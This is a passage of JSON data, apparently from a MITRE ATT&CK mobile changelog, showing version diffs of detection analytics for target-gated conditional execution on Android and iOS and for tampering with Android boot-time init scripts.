                            "channel": "application holds permissions enabling environment validation (e.g., location, phone state, nearby device/network context) and subsequently delays protected activity until qualifying values are present"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application queries target-selection attributes (e.g., location, SIM/operator, locale, device state, network identity) and then conditionally invokes sensitive framework APIs only after expected value is observed"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between environment checks and subsequent guarded execution"
                        },
                        {
                            "field": "TargetAttributeSet",
                            "description": "Environment attributes treated as likely guardrail inputs, such as locale, geolocation, carrier, Wi-Fi identity, device model, or lock state"
                        },
                        {
                            "field": "DormancyThreshold",
                            "description": "Amount of suppressed or low-activity runtime before sensitive behavior begins"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Baseline of legitimate apps expected to evaluate environment attributes before conditional feature activation"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether guarded execution is only suspicious when activated from background or without recent user interaction"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound traffic volume used to distinguish meaningful guarded execution from benign telemetry"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between environment checks and subsequent guarded execution\"}, {\"field\": \"TargetAttributeSet\", \"description\": \"Environment attributes treated as likely guardrail inputs, such as locale, geolocation, carrier, Wi-Fi identity, device model, or lock state\"}, {\"field\": \"DormancyThreshold\", \"description\": \"Amount of suppressed or low-activity runtime before sensitive behavior begins\"}, {\"field\": \"AllowedAppList\", \"description\": \"Baseline of legitimate apps expected to evaluate environment attributes before conditional feature activation\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether guarded execution is only suspicious when activated from background or without recent user interaction\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound traffic volume used to distinguish meaningful guarded execution from benign telemetry\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-13 18:45:30.914000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) application access to device- or environment-specific attributes used to validate target conditions, (2) suppression of sensitive behavior until those attributes match an expected value, and (3) immediate transition into protected actions such as sensor use, file access, or network communication only after the condition is satisfied. The defender observes a causal chain where an app repeatedly evaluates device state or environment context and withholds execution until a target-specific match occurs.\", \"old_value\": \"The user can review which applications have location and sensitive phone information permissions in the operating system\\u2019s settings menu. \\nApplication vetting services can detect unnecessary and potentially abused API calls.\\nApplication vetting services can detect unnecessary and potentially abused permissions.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1 @@\\n-The user can review which applications have location and sensitive phone information permissions in the operating system\\u2019s settings menu. \\n-Application vetting services can detect unnecessary and potentially abused API calls.\\n-Application vetting services can detect unnecessary and potentially abused permissions.\\n+Correlates (1) application access to device- or environment-specific attributes used to validate target conditions, (2) suppression of sensitive behavior until those attributes match an expected value, and (3) immediate transition into protected actions such as sensor use, file access, or network communication only after the condition is satisfied. The defender observes a causal chain where an app repeatedly evaluates device state or environment context and withholds execution until a target-specific match occurs.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"application holds permissions enabling environment validation (e.g., location, phone state, nearby device/network context) and subsequently delays protected activity until qualifying values are present\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application queries target-selection attributes (e.g., location, SIM/operator, locale, device state, network identity) and then conditionally invokes sensitive framework APIs only after expected value is observed\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_removed\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to123__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to123__0\"><a href=\"#difflib_chg_to123__top\">t</a></td><td class=\"diff_header\" id=\"from123_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;review&nbsp;which&nbsp;applications&nbsp;have&nbsp;location&nbsp;and&nbsp;sen</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to123__top\">t</a></td><td class=\"diff_header\" id=\"to123_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;application&nbsp;access&nbsp;to&nbsp;device-&nbsp;or&nbsp;environment-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">sitive&nbsp;phone&nbsp;information&nbsp;permissions&nbsp;in&nbsp;the&nbsp;operating&nbsp;system</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">specific&nbsp;attributes&nbsp;used&nbsp;to&nbsp;validate&nbsp;target&nbsp;conditions,&nbsp;(2)&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">\u2019s&nbsp;settings&nbsp;menu.&nbsp;&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;detect&nbsp;u</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">suppression&nbsp;of&nbsp;sensitive&nbsp;behavior&nbsp;until&nbsp;those&nbsp;attributes&nbsp;mat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nnecessary&nbsp;and&nbsp;potentially&nbsp;abused&nbsp;API&nbsp;calls.&nbsp;Application&nbsp;vet</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ch&nbsp;an&nbsp;expected&nbsp;value,&nbsp;and&nbsp;(3)&nbsp;immediate&nbsp;transition&nbsp;into&nbsp;prot</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ting&nbsp;services&nbsp;can&nbsp;detect&nbsp;unnecessary&nbsp;and&nbsp;potentially&nbsp;abused&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ected&nbsp;actions&nbsp;such&nbsp;as&nbsp;sensor&nbsp;use,&nbsp;file&nbsp;access,&nbsp;or&nbsp;network&nbsp;co</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">permissions.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">mmunication&nbsp;only&nbsp;after&nbsp;the&nbsp;condition&nbsp;is&nbsp;satisfied.&nbsp;The&nbsp;defen</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">der&nbsp;observes&nbsp;a&nbsp;causal&nbsp;chain&nbsp;where&nbsp;an&nbsp;app&nbsp;repeatedly&nbsp;evaluate</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s&nbsp;device&nbsp;state&nbsp;or&nbsp;environment&nbsp;context&nbsp;and&nbsp;withholds&nbsp;executio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;until&nbsp;a&nbsp;target-specific&nbsp;match&nbsp;occurs.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--28304317-cbde-45cd-bf0b-99b5cd8d1478",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-13 18:49:55.440000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0653#AN1738",
                            "external_id": "AN1738"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1738",
                    "description": "Detects conditional execution by correlating (1) application access to constrained environment signals such as location, locale, network context, device state, or user interaction timing, (2) prolonged inactivity or feature suppression despite available permissions, and (3) abrupt initiation of higher-risk behavior only when the expected target context is present. Because direct observation of some runtime decision logic is weaker on iOS, the defender relies more heavily on lifecycle, sensor, and downstream network effects following target-condition alignment.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "application remains inactive across normal execution windows and transitions into background or foreground activity burst only when qualifying device context, lock state, locale, or network condition exists"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "application has approved capabilities required for conditional execution (e.g., location/background modes) but observed behavior is deferred until target-specific state is present"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application exhibits repeated environment-context evaluation followed by delayed privileged framework use only after target-specific match"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between context checks and guarded execution"
                        },
                        {
                            "field": "TargetContextSet",
                            "description": "Expected environment properties used for gating, such as location region, locale, SSID/network context, device lock state, or user activity timing"
                        },
                        {
                            "field": "DormancyThreshold",
                            "description": "Duration of inactivity before guarded behavior begins"
                        },
                        {
                            "field": "ExpectedBackgroundModes",
                            "description": "Baseline of legitimate apps whose feature activation is context-dependent in background execution"
                        },
                        {
                            "field": "AllowedDestinationList",
                            "description": "Expected destinations for apps whose network activity legitimately begins only in certain contexts"
                        },
                        {
                            "field": "UserInteractionThreshold",
                            "description": "Acceptable recency of user interaction before guarded execution is considered suspicious"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between context checks and guarded execution\"}, {\"field\": \"TargetContextSet\", \"description\": \"Expected environment properties used for gating, such as location region, locale, SSID/network context, device lock state, or user activity timing\"}, {\"field\": \"DormancyThreshold\", \"description\": \"Duration of inactivity before guarded behavior begins\"}, {\"field\": \"ExpectedBackgroundModes\", \"description\": \"Baseline of legitimate apps whose feature activation is context-dependent in background execution\"}, {\"field\": \"AllowedDestinationList\", \"description\": \"Expected destinations for apps whose network activity legitimately begins only in certain contexts\"}, {\"field\": \"UserInteractionThreshold\", \"description\": \"Acceptable recency of user interaction before guarded execution is considered suspicious\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-13 18:49:55.440000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Detects conditional execution by correlating (1) application access to constrained environment signals such as location, locale, network context, device state, or user interaction timing, (2) prolonged inactivity or feature suppression despite available permissions, and (3) abrupt initiation of higher-risk behavior only when the expected target context is present. Because direct observation of some runtime decision logic is weaker on iOS, the defender relies more heavily on lifecycle, sensor, and downstream network effects following target-condition alignment.\", \"old_value\": \"The user can review which applications have location and sensitive phone information permissions in the operating system\\u2019s settings menu. \\nApplication vetting services can detect unnecessary and potentially abused API calls.\\nApplication vetting services can detect unnecessary and potentially abused permissions.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1 @@\\n-The user can review which applications have location and sensitive phone information permissions in the operating system\\u2019s settings menu. \\n-Application vetting services can detect unnecessary and potentially abused API calls.\\n-Application vetting services can detect unnecessary and potentially abused permissions.\\n+Detects conditional execution by correlating (1) application access to constrained environment signals such as location, locale, network context, device state, or user interaction timing, (2) prolonged inactivity or feature suppression despite available permissions, and (3) abrupt initiation of higher-risk behavior only when the expected target context is present. Because direct observation of some runtime decision logic is weaker on iOS, the defender relies more heavily on lifecycle, sensor, and downstream network effects following target-condition alignment.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application remains inactive across normal execution windows and transitions into background or foreground activity burst only when qualifying device context, lock state, locale, or network condition exists\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"application has approved capabilities required for conditional execution (e.g., location/background modes) but observed behavior is deferred until target-specific state is present\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][2]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application exhibits repeated environment-context evaluation followed by delayed privileged framework use only after target-specific match\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to164__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to164__0\"><a href=\"#difflib_chg_to164__top\">t</a></td><td class=\"diff_header\" id=\"from164_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;review&nbsp;which&nbsp;applications&nbsp;have&nbsp;location&nbsp;and&nbsp;sen</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to164__top\">t</a></td><td class=\"diff_header\" id=\"to164_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Detects&nbsp;conditional&nbsp;execution&nbsp;by&nbsp;correlating&nbsp;(1)&nbsp;application</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">sitive&nbsp;phone&nbsp;information&nbsp;permissions&nbsp;in&nbsp;the&nbsp;operating&nbsp;system</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;access&nbsp;to&nbsp;constrained&nbsp;environment&nbsp;signals&nbsp;such&nbsp;as&nbsp;location,</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">\u2019s&nbsp;settings&nbsp;menu.&nbsp;&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;detect&nbsp;u</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;locale,&nbsp;network&nbsp;context,&nbsp;device&nbsp;state,&nbsp;or&nbsp;user&nbsp;interaction&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nnecessary&nbsp;and&nbsp;potentially&nbsp;abused&nbsp;API&nbsp;calls.&nbsp;Application&nbsp;vet</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">timing,&nbsp;(2)&nbsp;prolonged&nbsp;inactivity&nbsp;or&nbsp;feature&nbsp;suppression&nbsp;desp</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ting&nbsp;services&nbsp;can&nbsp;detect&nbsp;unnecessary&nbsp;and&nbsp;potentially&nbsp;abused&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ite&nbsp;available&nbsp;permissions,&nbsp;and&nbsp;(3)&nbsp;abrupt&nbsp;initiation&nbsp;of&nbsp;high</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">permissions.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er-risk&nbsp;behavior&nbsp;only&nbsp;when&nbsp;the&nbsp;expected&nbsp;target&nbsp;context&nbsp;is&nbsp;pr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">esent.&nbsp;Because&nbsp;direct&nbsp;observation&nbsp;of&nbsp;some&nbsp;runtime&nbsp;decision&nbsp;l</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ogic&nbsp;is&nbsp;weaker&nbsp;on&nbsp;iOS,&nbsp;the&nbsp;defender&nbsp;relies&nbsp;more&nbsp;heavily&nbsp;on&nbsp;l</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ifecycle,&nbsp;sensor,&nbsp;and&nbsp;downstream&nbsp;network&nbsp;effects&nbsp;following&nbsp;t</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">arget-condition&nbsp;alignment.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--e8bfbaf2-cfa8-41fd-a5ee-48b57026ac7c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2025-12-02 15:38:03.766000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0654#AN1739",
                            "external_id": "AN1739"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1739",
                    "description": "Correlates anomalous modifications to boot-time or logon-time initialization artifacts (for example, init.rc, vendor init scripts, app_process or shell hijacks, and malicious BOOT_COMPLETED BroadcastReceivers) with subsequent unauthorized script execution after boot. From the defender\u2019s perspective this appears as integrity or attestation failures on the system partition, unexpected writes to protected init paths, new apps registering for boot events, and privileged processes invoking scripts or binaries from non-standard locations shortly after the device boots.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
                            "name": "AndroidAttestation:VerifiedBoot",
                            "channel": "Verified Boot or dm-verity reports partition hash mismatch, non-green boot state, or integrity failure"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
                            "name": "AndroidLogs:FileSystem",
                            "channel": "Modification to /system/etc/init/ or /vendor/etc/init/ boot-time scripts"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
                            "name": "AndroidLogs:Framework",
                            "channel": "BroadcastReceiver registration for android.intent.action.BOOT_COMPLETED by previously unseen or recently installed apps"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "AndroidLogs:Kernel",
                            "channel": "init or zygote process executing scripts or binaries from non-standard data or sdcard locations during early boot"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
                            "name": "AndroidAttestation:SafetyNet",
                            "channel": "SafetyNet attestation with CTSProfileMatch=false or BasicIntegrity=false"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
                            "name": "OEMAttestation:Knox",
                            "channel": "Samsung Knox attestation shows attestation_state=COMPROMISED or warranty bit set"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between boot/attestation event and suspicious script execution (for example, 0\u201310 minutes after BOOT_COMPLETED)."
                        },
                        {
                            "field": "AuthorizedBootReceivers",
                            "description": "Enterprise-specific allow list of packages expected to register BOOT_COMPLETED receivers."
                        },
                        {
                            "field": "ProtectedPaths",
                            "description": "OEM- and ROM-specific list of system and vendor init script locations that should be immutable in production devices."
                        },
                        {
                            "field": "ExpectedAttestationState",
                            "description": "Expected Verified Boot, SafetyNet, and OEM attestation states for enrolled devices. Custom ROM or dev devices may need relaxed thresholds."
                        },
                        {
                            "field": "IntegrityFailureThreshold",
                            "description": "Number or rate of attestation failures before escalating to a high-severity incident."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between boot/attestation event and suspicious script execution (for example, 0\\u201310 minutes after BOOT_COMPLETED).\"}, {\"field\": \"AuthorizedBootReceivers\", \"description\": \"Enterprise-specific allow list of packages expected to register BOOT_COMPLETED receivers.\"}, {\"field\": \"ProtectedPaths\", \"description\": \"OEM- and ROM-specific list of system and vendor init script locations that should be immutable in production devices.\"}, {\"field\": \"ExpectedAttestationState\", \"description\": \"Expected Verified Boot, SafetyNet, and OEM attestation states for enrolled devices. Custom ROM or dev devices may need relaxed thresholds.\"}, {\"field\": \"IntegrityFailureThreshold\", \"description\": \"Number or rate of attestation failures before escalating to a high-severity incident.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-12-02 15:38:03.766000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates anomalous modifications to boot-time or logon-time initialization artifacts (for example, init.rc, vendor init scripts, app_process or shell hijacks, and malicious BOOT_COMPLETED BroadcastReceivers) with subsequent unauthorized script execution after boot. From the defender\\u2019s perspective this appears as integrity or attestation failures on the system partition, unexpected writes to protected init paths, new apps registering for boot events, and privileged processes invoking scripts or binaries from non-standard locations shortly after the device boots.\", \"old_value\": \"On Android, Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android's SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromise devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"AndroidAttestation:VerifiedBoot\", \"channel\": \"Verified Boot or dm-verity reports partition hash mismatch, non-green boot state, or integrity failure\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8\", \"name\": \"AndroidLogs:FileSystem\", \"channel\": \"Modification to /system/etc/init/ or /vendor/etc/init/ boot-time scripts\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5\", \"name\": \"AndroidLogs:Framework\", \"channel\": \"BroadcastReceiver registration for android.intent.action.BOOT_COMPLETED by previously unseen or recently installed apps\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"AndroidLogs:Kernel\", \"channel\": \"init or zygote process executing scripts or binaries from non-standard data or sdcard locations during early boot\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"AndroidAttestation:SafetyNet\", \"channel\": \"SafetyNet attestation with CTSProfileMatch=false or BasicIntegrity=false\"}, \"root['x_mitre_log_source_references'][5]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"OEMAttestation:Knox\", \"channel\": \"Samsung Knox attestation shows attestation_state=COMPROMISED or warranty bit set\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Android-VerifiedBoot\", \"description\": \"Android. (n.d.). Verified Boot. Retrieved December 21, 2016.\", \"url\": \"https://source.android.com/security/verifiedboot/\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
